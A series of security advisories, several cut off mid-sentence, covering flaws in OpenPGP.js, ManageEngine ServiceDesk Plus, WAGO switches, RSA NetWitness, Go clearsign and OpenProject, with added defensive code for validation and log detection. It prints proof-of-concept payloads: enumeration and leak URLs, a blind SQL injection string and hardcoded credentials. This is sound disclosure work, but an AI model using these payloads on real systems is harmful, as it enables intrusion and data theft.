packet can contain subpackets. To indicate a message signature (e.g. a
signed e-mail), the signature type "text" is used. The text signature
verifies both its subpackets and the signed text.

During verification of a message signature, OpenPGP.js does not verify
that the signature is of type text. An attacker could therefore
construct a message that, instead of a text signature, contains a
signature of another type. As the input required for the verification
process depends on the signature type, an attacker could use a
signature with a type that only verifies its subpackets and does not
require additional input. An attacker could construct a message that
contains a valid "standalone" or "timestamp" signature packet signed by
another person. OpenPGP.js would incorrectly assume this message to be
signed by that person.

2) Information from Unhashed Subpackets is Trusted (CVE-2019-9154)
OpenPGP signature subpackets contain information related to a signature
(e.g. the creation timestamp). These subpackets may appear in a
"hashed" and an "unhashed" subpacket container. While the information
in the hashed subpackets is signed, the unhashed subpackets are not
cryptographically protected. OpenPGP.js however does not distinguish
between these subpackets. When parsing a signature packet, the signed
information is parsed first. When the unhashed subpackets are read
afterwards, the information from the hashed subpackets is overwritten.
An attacker could therefore arbitrarily modify the contents of e.g. a
key certification signature or a revocation signature. As a result, the
attacker could e.g. convince a victim to use an obsolete key for
encryption.

3) Invalid Curve Attack (CVE-2019-9155)
The implementation of the Elliptic Curve Diffie-Hellman (ECDH) key
exchange algorithm does not verify that the communication partner's
public key is valid (i.e. that the point lies on the elliptic curve).
This causes the application to implicitly calculate the resulting
secret key not on the specified elliptic curve but on an altered curve.
By carefully choosing multiple altered curves (and therefore the
resulting public keys), and observing whether decryption fails, an
attacker can extract the victim's private key.

This attack requires the attacker to be able to provide multiple
manipulated messages and to observe whether decryption fails.

Proof of concept:
-----------------
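The two signature-packet issues above (1 and 2), as an added example that is not OpenPGP.js code: a parser for RFC 4880 signature subpacket areas, the unsafe merge that lets the unhashed area overwrite the hashed one beside a merge where hashed data wins, and the signature-type check that message verification needs. The subpacket bytes are constructed; the set of types tolerated in the unhashed area is this example's choice.

```python
"""Added example, not OpenPGP.js code: RFC 4880 signature subpacket handling.
Shows (a) why the unhashed area must never override the hashed one
(CVE-2019-9154) and (b) the signature-type check for message verification
(CVE-2019-9153)."""
import struct

# RFC 4880 signature types (section 5.2.1) and subpacket types (5.2.3.1).
SIG_BINARY, SIG_TEXT, SIG_STANDALONE, SIG_TIMESTAMP = 0x00, 0x01, 0x02, 0x40
SUB_CREATION_TIME, SUB_ISSUER = 2, 16
# Example's choice: only the issuer key ID (a lookup hint carrying no
# security decision) is accepted from the unprotected unhashed area.
UNHASHED_ALLOWED = {SUB_ISSUER}


def encode_subpacket(sub_type, body):
    """Serialise one subpacket with the 1-, 2- or 5-octet length prefix.
    The length covers the type octet plus the body."""
    length = len(body) + 1
    if length < 192:
        prefix = bytes([length])
    elif length < 16320:
        length -= 192
        prefix = bytes([192 + (length >> 8), length & 0xFF])
    else:
        prefix = b"\xff" + struct.pack(">I", length)
    return prefix + bytes([sub_type]) + body


def parse_subpackets(area):
    """Return [(type, body), ...] for one hashed or unhashed subpacket area."""
    out, i = [], 0
    while i < len(area):
        first = area[i]
        if first < 192:
            length, i = first, i + 1
        elif first < 255:
            if i + 2 > len(area):
                raise ValueError("truncated two-octet length")
            length, i = ((first - 192) << 8) + area[i + 1] + 192, i + 2
        else:
            if i + 5 > len(area):
                raise ValueError("truncated five-octet length")
            length, i = struct.unpack(">I", area[i + 1:i + 5])[0], i + 5
        if length == 0 or i + length > len(area):
            raise ValueError("malformed or truncated subpacket")
        out.append((area[i], bytes(area[i + 1:i + length])))
        i += length
    return out


def merge_vulnerable(hashed, unhashed):
    """The behaviour described for OpenPGP.js <= 4.2.0: unhashed subpackets
    are read after the hashed ones and overwrite them."""
    merged = dict(parse_subpackets(hashed))
    merged.update(parse_subpackets(unhashed))
    return merged


def merge_fixed(hashed, unhashed):
    """Signed data wins: unhashed subpackets only fill allowed, absent types."""
    merged = dict(parse_subpackets(hashed))
    for sub_type, body in parse_subpackets(unhashed):
        if sub_type in UNHASHED_ALLOWED and sub_type not in merged:
            merged[sub_type] = body
    return merged


def is_message_signature(sig_type):
    """Only document signatures (binary 0x00 / text 0x01) attest to message
    content; standalone and timestamp signatures only cover their subpackets."""
    return sig_type in (SIG_BINARY, SIG_TEXT)


def creation_time(merged):
    return struct.unpack(">I", merged[SUB_CREATION_TIME])[0]


# Constructed sample: a signed creation time, and an attacker-appended unhashed
# area carrying a different creation time plus an issuer hint.
SIGNED_TIME, FORGED_TIME = 1567000000, 0
HASHED_AREA = encode_subpacket(SUB_CREATION_TIME, struct.pack(">I", SIGNED_TIME))
UNHASHED_AREA = (encode_subpacket(SUB_CREATION_TIME, struct.pack(">I", FORGED_TIME))
                 + encode_subpacket(SUB_ISSUER, bytes(range(1, 9))))

if __name__ == "__main__":
    print("vulnerable merge sees:", creation_time(merge_vulnerable(HASHED_AREA, UNHASHED_AREA)))
    print("fixed merge sees:     ", creation_time(merge_fixed(HASHED_AREA, UNHASHED_AREA)))
```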
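The public-key validation that issue 3 (CVE-2019-9155) calls for, as an added example that is not OpenPGP.js code: before an ECDH shared secret is computed, the peer's point is decoded from the uncompressed form OpenPGP carries for Weierstrass curves and rejected unless it lies on the curve. NIST P-256, one of the curves OpenPGP supports, is used with its standard parameters; the implied_b() helper shows which altered curve an unvalidated implementation would silently compute on.

```python
"""Added example, not OpenPGP.js code: reject off-curve ECDH public points
(the missing check behind CVE-2019-9155), shown for NIST P-256."""

# NIST P-256 domain parameters (standard values): y^2 = x^3 + a*x + b mod p.
P = 2**256 - 2**224 + 2**192 + 2**96 - 1
A = P - 3
B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
GX = 0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296
GY = 0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5
COORD_LEN = 32  # octets per coordinate for a 256-bit curve


def is_on_curve(x, y):
    """True iff (x, y) satisfies the P-256 equation with in-range coordinates.
    P-256 has cofactor 1, so an on-curve check also rules out small subgroups."""
    if not (0 <= x < P and 0 <= y < P):
        return False
    return (y * y - (x * x * x + A * x + B)) % P == 0


def implied_b(x, y):
    """The b' of the curve y^2 = x^3 + a*x + b' that actually contains (x, y).
    Group law formulas never use b, so an implementation that skips validation
    computes the shared secret on this altered curve without noticing."""
    return (y * y - x * x * x - A * x) % P


def encode_point(x, y):
    """Uncompressed SEC1 encoding 0x04 || X || Y, as used in OpenPGP ECDH keys."""
    return b"\x04" + x.to_bytes(COORD_LEN, "big") + y.to_bytes(COORD_LEN, "big")


def decode_ecdh_public_point(point):
    """Decode 0x04 || X || Y and refuse anything malformed or off-curve."""
    if len(point) != 1 + 2 * COORD_LEN or point[0] != 0x04:
        raise ValueError("expected an uncompressed point 0x04 || X || Y")
    x = int.from_bytes(point[1:1 + COORD_LEN], "big")
    y = int.from_bytes(point[1 + COORD_LEN:], "big")
    if not is_on_curve(x, y):
        raise ValueError("public point is not on P-256: refusing ECDH")
    return x, y


def validate_before_ecdh(point):
    """Gate to run before any scalar multiplication with a peer's point."""
    try:
        decode_ecdh_public_point(point)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    # Constructed off-curve point: the generator with its y coordinate bumped.
    bad = encode_point(GX, GY + 1)
    print("generator accepted:", validate_before_ecdh(encode_point(GX, GY)))
    print("altered point accepted:", validate_before_ecdh(bad))
    print("altered point lies on curve with b' =", hex(implied_b(GX, GY + 1)))
```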
SEC Consult SA-20190821-0 :: Unauthenticated sensitive information leakage in Zoho Corporation ManageEngine ServiceDesk Plus
SEC Consult Vulnerability Lab Security Advisory < 20190821-0 >
===
title: Unauthenticated sensitive information leakage
product: Zoho Corporation ManageEngine ServiceDesk Plus
vulnerable version: v10 <10509
fixed version: v10 >=10509
CVE number: CVE-2019-15045, CVE-2019-15046
impact: Critical
homepage: https://www.manageengine.com/products/service-desk/
found: 2019-06-27
by: Johannes Greil (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting to delivering awesome customer service. It provides great visibility and central control in dealing with IT issues to ensure that businesses suffer no downtime. For 10 years and running, it has been delivering smiles to millions of IT folks, end users, and stakeholders alike."

Source: https://www.manageengine.com/products/service-desk/

Business recommendation:
---
The vendor provides a patched version, which should be installed immediately. Furthermore, a thorough security analysis is highly recommended, as only a short spot check has been performed and further critical issues are to be expected. A workaround exists for mitigating vulnerability 1b (user enumeration).

Vulnerability overview/description:
---
1) Unauthenticated sensitive information leakage

a) Unauthenticated download of internal support ticket information (CVE-2019-15046)
The software offers functionality ("fosagent") that an unauthenticated attacker can use to obtain information about internal "events". In our test it was possible to access sensitive internal information (tickets) written by users of the application in exchange with the support team. Depending on the contents of the tickets, sensitive data might leak through this functionality. Which information ends up in those "events" likely also depends on the ServiceDesk Plus configuration.

b) User Enumeration in AjaxDomainServlet (CVE-2019-15045)
It is possible to collect valid usernames by interacting with the "AjaxDomainServlet" of the application without prior authentication. This increases the efficiency of brute-force attacks: if the username is known, only the corresponding password has to be found. Furthermore, the servlet leaks whether a user is a locally configured or a domain user, and it leaks the internal domain name of the requested user account. According to the vendor, the affected feature is intended behaviour; a workaround to disable it has been provided (see further below).

Proof of concept:
---
1) Unauthenticated sensitive information leakage

a) Unauthenticated download of internal support ticket information (CVE-2019-15046)
The "fosagent" functionality provides a "download-file" servlet that an unauthenticated attacker can use to iterate through existing internal "events". The downloadable information looks like internal ticket system data and other data exchanged between users and the help desk support team. The "log-pos" parameter takes a number, a colon and another number to address the corresponding event index; an attacker can simply increment those numbers to access different information:

https://$IP/fosagent/repl/download-file?log-pos=1:0

b) User Enumeration in AjaxDomainServlet (CVE-2019-15045)
The following URL can be used to efficiently enumerate user accounts configured within ManageEngine ServiceDesk Plus. No prior authentication is required. The "search" parameter carries the user account name:

https://$IP/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=$USER

If the user exists and is a local user (configured within the web application), the response is "Not in Domain". If the user exists and is a domain user (e.g. LDAP), the response is the corresponding internal domain name. If the response stays empty, the user does not exist.

Vulnerable / tested versions:
---
Version 10 has been tested. The vendor did not confirm whether older releases are affected as well.

Vendor contact timeline:
---
2019-07-02: Contacting vendor through ManageEngine Security Response Center (MESRC). Uploaded security ad
SEC Consult SA-20190612-0 :: Multiple vulnerabilities in WAGO 852 Industrial Managed Switch Series
SEC Consult Vulnerability Lab Security Advisory < 20190612-0 >
===
title: Multiple vulnerabilities
product: WAGO 852 Industrial Managed Switch Series
vulnerable version: 852-303
homepage: https://www.wago.com
found: 2019-03-08
by: T. Weber (Office Vienna)
    IoT Inspector
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"New ideas are the driving force behind our success. WAGO is a family-owned company headquartered in Minden, Germany. Independently operating for three generations, WAGO is the global leader of spring pressure electrical interconnect and automation solutions. For more than 60 years, WAGO has developed and produced innovative products for packaging, transportation, process, industrial and building automation markets amongst others. Aside from its innovations in spring pressure connection technology, WAGO has introduced numerous innovations that have revolutionized industry. Further ground-breaking inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."

Source: http://www.wago.us/wago/

Business recommendation:
---
SEC Consult recommends to immediately apply the available patches from the vendor. A thorough security review should be performed by security professionals to identify further potential security issues.

Vulnerability overview/description:
---
The industrial managed switch series 852 from WAGO is affected by multiple vulnerabilities, among them outdated software components embedded in the firmware. Furthermore, hardcoded password hashes and credentials were found by an automated scan with IoT Inspector. Two vulnerabilities (CVE-2017-16544 and CVE-2015-0235) were verified by emulating the device with the MEDUSA scalable firmware runtime. The validity of the password hashes and of the embedded keys was also verified on the emulated device.

1) Known BusyBox Vulnerabilities
The BusyBox toolkit in version 1.12.0 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the vulnerabilities (CVE-2017-16544) was verified using the MEDUSA scalable firmware runtime.

2) Known GNU glibc Vulnerabilities
GNU glibc in version 2.8 is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the vulnerabilities (CVE-2015-0235, "GHOST") was verified using the MEDUSA scalable firmware runtime.

3) Hardcoded Credentials (CVE-2019-12550)
The device contains hardcoded users and passwords that can be used to log in via SSH and Telnet.

4) Embedded Private Keys (CVE-2019-12549)
The device contains a hardcoded private key for the SSH daemon. The fingerprint of the SSH host key presented by the running S SH daemon matches the embedded private key.

Proof of concept:
---
1) Known BusyBox Vulnerabilities
BusyBox version 1.12.0 contains multiple CVEs, e.g. CVE-2013-1813, CVE-2016-2148, CVE-2016-6301, CVE-2011-2716, CVE-2011-5325, CVE-2015-9261, CVE-2016-2147 and more. The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on an emulated device. A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the vulnerability:
---
# ls "pressing "
test
]55;test.txt
#
---

2) Known GNU glibc Vulnerabilities
GNU glibc version 2.8 contains multiple CVEs, e.g. CVE-2010-0296, CVE-2010-3856, CVE-2012-4412, CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472 and more. The gethostbyname buffer overflow (GHOST) was checked with the exploit code from https://seclists.org/oss-sec/2015/q1/274, which was compiled and executed on the emulated device.

3) Hardcoded Credentials (CVE-2019-12550)
The following credentials were found in the 'passwd' file of the firmware:

root    [EMPTY PASSWORD] (no password is set for the account)
admin

Using these credentials, it is possible to connect via Telnet and SSH to the emulated device. Example for Telnet:
---
[root@localhost ~]# telnet 192.168.0.133
Trying 192.168.0.133...
Connected to 192.168.0.133.
Escape cha
SEC Consult SA-20190515-0 :: Authorization Bypass in RSA NetWitness (@sec_consult)
SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >
===
title: Authorization Bypass
product: RSA NetWitness
vulnerable version: <10.6.6.1, <11.2.1.1
fixed version: 10.6.6.1, 11.2.1.1
CVE number: CVE-2019-3724
impact: Medium
homepage: https://www.rsa.com
found: 2018-09-18
by: Mantas Juskauskas (Office Vilnius)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"RSA provides more than 30,000 customers around the world with the essential security capabilities to protect their most valuable assets from cyber threats. With RSA's award-winning products, organizations effectively detect, investigate, and respond to advanced attacks; confirm and manage identities; and ultimately, reduce IP theft, fraud, and cybercrime."

Source: https://www.rsa.com/en-us/company/about

Business recommendation:
---
By exploiting the vulnerability documented in this advisory, an unauthorized attacker can access an administrative resource that may contain plaintext credentials to a third-party system. The vendor provides a patch, which should be installed on affected systems.

Vulnerability overview/description:
---
The authorization mechanism of the platform is prone to an authorization bypass vulnerability, which can easily be exploited by authenticated (but low-privileged) remote attackers to gain access to administrative information, including plaintext passwords.

Proof of concept:
---
A logged-in low-privileged user (e.g. with the role "Analyst") is able to access an administrative resource by calling the following URL:

https://[host]/admin/system/whois/properties

The server then returns the following HTTP response, which contains sensitive information about a third-party whois service, including plaintext passwords:

HTTP/1.1 200 OK
Server: nginx
Date: [snip]
Content-Type: application/json;charset=UTF-8
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: [snip]
Content-Length: 795

{"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":10,"cacheMaxSize":5,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":10,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":259200},"cache-max-size":5,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":6

Vulnerable / tested versions:
---
The vulnerability has been verified to exist in the RSA NetWitness platform, version 11.1.0.1. According to the vendor, platform version 10 is also affected. The following versions are vulnerable:
* <10.6.6.1
* <11.2.1.1

Vendor contact timeline:
---
2018-10-01: Contacting vendor through PGP via sec...@dell.com
2018-10-02: Vendor acknowledges the information was received, forwards the info to the relevant department
2018-10-11: Vendor confirms the impact of the authorization issue, starts to work on the remediation timeline
2018-10-15: Vendor provides additional information
2018-10-22: Contacting vendor to provide the remediation timeline
2018-10-23: Further email exchange related to the remediation timeline
2019-01-18: Vendor provides an update on the fix timeline
2019-03-05: Asking for a status update
2019-03-06: Vendor provides a status update on the release; patch for platform version 11 will be released in March, version 10 mid-April
2019-04-01: Asking for a specific release date & further status update
2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change; they will inform us
2019-05
SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)
SEC Consult Vulnerability Lab Security Advisory < 20190513-0 >
===
title: Cleartext message spoofing
product: Supplementary Go Cryptography Libraries
vulnerable version: commit a5d413f7728c81fb97d96a2b722368945f651e78, branch master (https://github.com/golang/crypto.git)
fixed version: commit c05e17bb3b2dca130fc919668a96b4bec9eb9442
CVE number: CVE-2019-11841
impact: High
homepage: https://golang.org
found: 2019-03-28
by: Aida Mynzhasova (Office Berlin)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"Package clearsign generates and processes OpenPGP, clear-signed data. See RFC 4880, section 7. Clearsigned messages are cryptographically signed, but the contents of the message are kept in plaintext so that it can be read without special tools."

Source: https://godoc.org/golang.org/x/crypto/openpgp/clearsign

Business recommendation:
---
During a short security test, SEC Consult found a severe security vulnerability in the clearsign package of the supplementary Go cryptography libraries. This vulnerability could allow an attacker:
- to lead a victim to believe the signature was generated using a different message digest algorithm than the one actually used;
- to spoof clearsigned OpenPGP messages by prepending arbitrary text to the cleartext without invalidating the signature.

Vulnerability overview/description:
---
1) Cleartext message spoofing
According to RFC 4880, section 7, a cleartext signed message can contain one or more optional "Hash" Armor Headers. The "Hash" Armor Header specifies the message digest algorithm(s) used for the signature. The "clearsign" package of the supplementary Go cryptography libraries ignores the value of this header, so an attacker can set it to anything and thereby lead a victim to believe the signature was generated using a different message digest algorithm than the one actually used.

Moreover, since the library skips Armor Header parsing altogether, an attacker can not only embed arbitrary Armor Headers but also prepend arbitrary text to the cleartext message without invalidating the signature.

Proof of concept:
---
1) Cleartext message spoofing
The following cleartext message with a valid SHA-1 signature was generated using GnuPG (content of the no_spoof.asc file):

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Message to be signed
-----BEGIN PGP SIGNATURE-----

iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-----END PGP SIGNATURE-----

Then the message was tampered with by changing the value of the "Hash" Armor Header from SHA-1 to SHA-512 (content of the hash_spoof.asc file):

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Message to be signed
-----BEGIN PGP SIGNATURE-----

iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-----END PGP SIGNATURE-----

Finally, a string containing the Unicode-encoded "LINE TABULATION" character (U+000B) was embedded in the Armor Header of the message (content of the cleartext_spoof.asc file):

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512\u000bThis data is part of the header

Message to be signed
-----BEGIN PGP SIGNATURE-----

iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-----END PGP SIGNATURE-----

When the "LINE TABULATION" character is inserted, the header text after it looks as if it were p
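A strict parser for the cleartext framework, written for this page as an added example (it is not the Go library's code), run over the three messages above. It parses the Armor Header section the way RFC 4880, section 7 describes it, so the `Hash: SHA512<VT>...` line is rejected as a malformed header, and it reads the hash-algorithm octet out of the signature packet to check it against the Hash header (the advisory's signature declares algorithm 2, SHA-1). A lenient parser that just skips to the first empty line, the pattern the advisory describes, is shown alongside. The signature armor is the one from the advisory, with the armor lines' five dashes restored; the messages are rebuilt around it.

```python
"""Strict vs lenient parsing of an OpenPGP cleartext-signed message (RFC 4880, section 7).

Added example, not the golang.org/x/crypto/openpgp/clearsign code. The three
messages are rebuilt from the advisory's no_spoof / hash_spoof / cleartext_spoof files.
"""
import base64
import re

BEGIN_SIGNED = "-----BEGIN PGP SIGNED MESSAGE-----"
BEGIN_SIG = "-----BEGIN PGP SIGNATURE-----"
END_SIG = "-----END PGP SIGNATURE-----"
# "Hash" is the only Armor Header allowed in the cleartext framework; algorithm names are
# plain tokens, so a control character or any other text makes the line malformed.
HASH_HEADER = re.compile(r"Hash: ([A-Za-z0-9]+(?:,[A-Za-z0-9]+)*)")
HASH_ALGO_NAMES = {1: "MD5", 2: "SHA1", 3: "RIPEMD160", 8: "SHA256", 9: "SHA384", 10: "SHA512", 11: "SHA224"}

# Signature block from the advisory (GnuPG, RSA, SHA-1)
SIGNATURE_B64 = """\
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N"""
SIGNATURE_ARMOR = "%s\n\n%s\n%s\n" % (BEGIN_SIG, SIGNATURE_B64, END_SIG)


def clearsigned(hash_header, message="Message to be signed"):
    """Assemble a cleartext-signed message around the advisory's signature block."""
    return "%s\nHash: %s\n\n%s\n%s" % (BEGIN_SIGNED, hash_header, message, SIGNATURE_ARMOR)


NO_SPOOF = clearsigned("SHA1")
HASH_SPOOF = clearsigned("SHA512")
CLEARTEXT_SPOOF = clearsigned("SHA512\x0bThis data is part of the header")   # U+000B LINE TABULATION


def _body_and_signature(lines, start):
    """Dash-unescape the text; return (message, lines of the armored signature)."""
    end = lines.index(BEGIN_SIG, start)
    body = [l[2:] if l.startswith("- ") else l for l in lines[start:end]]
    return "\n".join(body), lines[end + 1:lines.index(END_SIG, end)]


def parse_clearsigned_strict(text):
    """Accept only well-formed 'Hash:' headers, then exactly one empty line, then the text."""
    lines = text.replace("\r\n", "\n").split("\n")
    if lines[0] != BEGIN_SIGNED:
        raise ValueError("missing cleartext header line")
    hashes, i = set(), 1
    while lines[i] != "":
        m = HASH_HEADER.fullmatch(lines[i])
        if m is None:
            raise ValueError("malformed or unexpected Armor Header: %r" % lines[i])
        hashes.update(m.group(1).split(","))
        i += 1
    message, sig_lines = _body_and_signature(lines, i + 1)
    return hashes, message, sig_lines


def parse_clearsigned_lenient(text):
    """The pattern the advisory describes: skip everything up to the first empty line unchecked."""
    lines = text.replace("\r\n", "\n").split("\n")
    message, sig_lines = _body_and_signature(lines, lines.index("") + 1)
    return set(), message, sig_lines


def strict_accepts(text):
    try:
        parse_clearsigned_strict(text)
        return True
    except ValueError:
        return False


def signature_hash_algo(sig_lines):
    """Hash-algorithm octet of an old-format v4 signature packet; the first data line suffices."""
    data = [l for l in sig_lines if l and ":" not in l and not l.startswith("=")]
    pkt = base64.b64decode(data[0])
    if pkt[0] & 0xC0 != 0x80 or (pkt[0] >> 2) & 0x0F != 2:
        raise ValueError("not an old-format signature packet")
    body = pkt[1 + {0: 1, 1: 2, 2: 4, 3: 0}[pkt[0] & 3]:]      # skip tag and length octets
    if body[0] != 4:
        raise ValueError("only v4 signatures handled")
    return body[3]                                             # version, type, pk algo, hash algo


def hash_header_consistent(hashes, algo_id):
    """The Hash header must name the algorithm the signature used (no header means MD5)."""
    if not hashes:
        return algo_id == 1
    return HASH_ALGO_NAMES.get(algo_id) in hashes


if __name__ == "__main__":
    for name, msg in (("no_spoof", NO_SPOOF), ("hash_spoof", HASH_SPOOF), ("cleartext_spoof", CLEARTEXT_SPOOF)):
        if not strict_accepts(msg):
            print("%-16s rejected: malformed Armor Header" % name)
            continue
        hashes, _, sig = parse_clearsigned_strict(msg)
        algo = signature_hash_algo(sig)
        print("%-16s header=%s signature=%s consistent=%s" % (name, sorted(hashes), HASH_ALGO_NAMES[algo], hash_header_consistent(hashes, algo)))
```

Of the three files, only no_spoof passes both checks: hash_spoof parses but its header (SHA512) contradicts the packet (SHA-1), and cleartext_spoof is rejected before any signature verification because its header line is not a valid "Hash" header. The lenient parser accepts all three and returns the same "Message to be signed" for each, which is how the header region ends up unverified and displayable as if it were message text.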
SEC Consult SA-20190510-0 :: Unauthenticated SQL Injection vulnerability in OpenProject
SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
===
title: Unauthenticated SQL Injection vulnerability
product: OpenProject
vulnerable version: 5.0.0 - 8.3.1
fixed version: 8.3.2 & 9.0.0
CVE number: CVE-2019-11600
impact: Critical
homepage: https://www.openproject.org
found: 2019-04-17
by: T. Soo (Office Bangkok)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"OpenProject is the leading open source project management software. Support your project management process along the entire project life cycle: From project initiation to closure."

Source: https://www.openproject.org/

Business recommendation:
---
The vendor provides a patch, which should be applied immediately. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected by further security issues.

Vulnerability overview/description:
---
An SQL injection vulnerability has been identified in the web "activities API". If OpenProject is configured not to require authentication for API access, an unauthenticated attacker could exploit it to extract potentially sensitive information from the database.

Proof of concept:
---
Requesting the following URL triggers a time delay, which serves as proof of concept for the blind SQL injection:

http:///api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(%3d

Vulnerable / tested versions:
---
The vulnerability has been identified in OpenProject version 8.3.1, which was the most current version at the time of discovery. According to the vendor, all versions between 5.0.0 and 8.3.1 are affected. Older versions (< 5.0.0) are not vulnerable.
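A small detector for the family of time-based probes the PoC belongs to, run over constructed access-log lines. This is an added example for this page, not OpenProject code: it URL-decodes each request path (twice, since probes are often double-encoded), flags the delay primitives of the common database engines and the `) AND n=(SELECT ...` scaffolding that injection tools wrap around them, and treats a match whose response time also crosses the expected delay as the strongest signal. The log lines are made up; the first carries the advisory's PoC path with the host left out as in the advisory.

```python
"""Flag time-based SQL injection probes in web-server access logs.

Added example, not OpenProject code. The log lines are constructed; the first
one carries the advisory's PoC payload against the activities API.
"""
import re
from urllib.parse import unquote_plus

# Request line of an Apache/nginx combined-format entry, plus an optional trailing request-time field
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<bytes>\d+|-)(?: (?P<time>[\d.]+))?')

# Delay primitives of the common engines, matched case-insensitively on the decoded path
DELAY_PRIMITIVES = {
    "postgresql": re.compile(r"\bpg_sleep\s*\(", re.I),
    "mysql":      re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "mssql":      re.compile(r"\bwaitfor\s+delay\b", re.I),
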